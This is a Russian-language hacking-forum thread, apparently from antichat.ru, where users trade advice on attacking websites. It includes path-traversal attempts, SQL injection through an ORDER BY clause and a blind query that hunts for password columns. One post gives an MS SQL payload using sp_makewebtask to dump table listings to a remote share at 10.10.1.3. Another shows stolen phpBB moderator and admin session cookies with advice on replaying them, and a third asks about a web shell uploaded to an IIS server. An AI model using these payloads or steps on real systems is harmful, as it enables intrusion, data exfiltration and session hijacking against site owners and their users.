Ясненько. В этом направлении и думал. А вот в этом скрипте инклюд конечно более важен, у меня есть исходники этого скрипта, не нашёл в нём никаких проверок на фильтрацию.. (.. /) Может какой мод стоить или какая настройка апатча\пхп? Просто есть два хоста с этой тулзой, на обоих одинаковый результат при подставлении ../../ Пробывал url endec, результат такой же.
Database query errorYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 limit 0,50' at line 1 вылазит при &script=post+order+by+1 за SQL - inj можно считать? и если да, то как ее реализовать PS при этом имею к примеру при &script=post все норма, а если стави &script=post1 пишет Database query errorUnknown column 'post1 in 'order clause'
order by $script limit 0,50: =>near 'order by 1 limit 0,50' =>Unknown column 'post1 in 'order clause' https://forum.antichat.ru/showpost.php?p=1494443&postcount=11 https://forum.antichat.ru/threadnav35207-1-10.html
такой вопрос, имею слепую, знаю колонки , какой составить запрос что бы искать посимвольно имя таблицу в которой есть колока к примеру pass?? ЗЫ ElteRUS От тебя жду ответа =)
...(select table_name from information_schema.columns where column_name like 0x257061737325 limit 0,1)...
Есть инъекция в MS SQL Но отключен вывод ошибок Что можно сделать? Може как-то как в MySQL с union select 1,2,3,4?
Что-то мне сегодня захотелось сделать что-нибудь полезное Можно использовать sp_makewebtask, чтобы записать ваш запрос в HTML: '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES" Указываемый IP должен иметь папку "share" с доступом для Everyone. Хотя помнится я как-то и с union select развлекался, правда в postgres sql но погоды это не делает, ибо что в постгрис что в мсскл нужно чтобы типы всех параметров совпадали, так что не компостируй себе мозГ, читай http://www.securitylab.ru/analytics/216211.php
здрасте всем... нашёл пасивку на одном ресурсе... суть такова, стоит самописный сайт и пхпбб. дело в том что юзеры на сайте и на форуме логинятся под одним ником, кукисы такие как у пхпбб. дело в том что смог угнать модера куки у него вот такого вида Code: iua=1; b=b; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; ; phpbb2mysql_sid=dc4b2038e838e83c1789c49dc4960b4d Потом смог же заманить на пасивку и админа но у него в куках присутствует еше какое то поле Code: ; phpbb2mysql_sid=6c5ea6d3269f4ba89585ecb7547090db; [b][color=red]phpbb2mysql_t=a:2:{i:12062;i:1254481197;i:12078;i:1254507094;};[/b][/color] phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";i:-1;}; iua=1; b=b Вот вопрос, как мне в опере или в другом браузере добавить такое поле? в опере на сколько я понял можно менять существующие поля, но новые создавать нельзя... з.ы. пробовал переименововать поле b но ничего не получалось, после обновления страницы я становился неавторизованым
у Fire Fox есть такой плагин - cookie editor называется. Вот там и добавляется все спокойно https://addons.mozilla.org/en-US/firefox/addon/573
Есть ли прога, которая из имеющегося текстового списка брала слова, вставляла бы их в окошко клиента (чат, к примеру) и нажимала/кликала Ввод ?
ломаю сайт при пподстановки ковычки пишет какой еще рефер нужен перебрал столбцы до 30 все одно и тоже не катиткак ты говоришь бейсик авторизация
Бред какой-то. Есть еще ряд показателей, уникальных в каждом случае, которые просто надо уметь видеть. Если есть иньекция, и она блайнд - это не значит, что тот, кто её делает, должен быть слеп - перенаправление на другую старницу - изменение содержимого страницы - ........ ........... и etc.
появился шелл,на вин 2003/ISS 6.0,редактировать файлы прав нету,на созданные файлы шеллом даже права 777 не ставит,что это может быть? зиливал скрипитом через пхпадмин,это первый раз такое..